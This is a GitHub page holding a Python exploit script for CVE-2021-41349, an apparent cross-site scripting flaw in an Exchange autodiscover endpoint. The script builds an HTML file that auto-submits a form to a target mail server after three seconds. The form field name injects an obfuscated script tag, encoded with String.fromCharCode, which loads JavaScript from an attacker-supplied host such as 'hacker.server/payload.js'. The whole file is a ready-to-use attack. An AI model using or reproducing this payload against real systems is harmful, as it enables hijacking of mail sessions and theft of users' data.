-
Notifications
You must be signed in to change notification settings - Fork 6
/
CVE-2021-41349.py
executable file
·72 lines (59 loc) · 2.34 KB
/
CVE-2021-41349.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/python3
import os
import sys
art='''
__ __ __ __ __ __ __
/ \ /|_ __ _) / \ _) /| __ |__| /| _) |__| (__\
\__ \/ |__ /__ \__/ /__ | | | __) | __/
By: exploitio
'''
if len(sys.argv) < 4:
print('Usage:\npython3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html')
print('Or:\n./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html')
exit(1)
target = sys.argv[-3]
js_payload_url = sys.argv[-2]
out_file = sys.argv[-1]
def text_to_ascii_str(text):
ascii_array = [ord(c) for c in text]
if len(ascii_array) < 1:
return None
else:
return ','.join(str(ascii) for ascii in ascii_array)
HTML_PAYLOAD = '''
<html>
<head>
<title>XSS | CVE-2021-41349</title>
</head>
<body>
<div>
<h1>XSS | CVE-2021-41349</h1>
<p>You'll be redirected after <strong>3 Seconds</strong>, Please Wait ....</p>
</div>
<script>
function submit() {
var form = document.createElement("form");
form.method = "POST";
form.action = "!!!TARGET!!!/autodiscover/autodiscover.json";
form.enctype = "application/x-www-form-urlencoded"
var el = document.createElement("input");
el.name= "<script>document.getElementsByTagName(String.fromCharCode(98,111,100,121))[0].appendChild(document.createElement(String.fromCharCode(115,99,114,105,112,116))).setAttribute(String.fromCharCode(115,114,99),String.fromCharCode(!!!SCR_URL!!!));a";
el.value= '"<\/script>';
form.appendChild(el);
var el = document.createElement("input");
el.name= "x"
el.value= "1";
form.appendChild(el);
document.body.appendChild(form);
form.submit();
}
// Pause 3 secs, Then Run
setTimeout(submit, 3000)
</script>
</body>
</html>
'''.replace('!!!TARGET!!!', target).replace('!!!SCR_URL!!!', text_to_ascii_str(js_payload_url))
if os.path.exists(out_file):
os.remove(out_file)
with open(out_file, 'w+') as file:
file.write(HTML_PAYLOAD)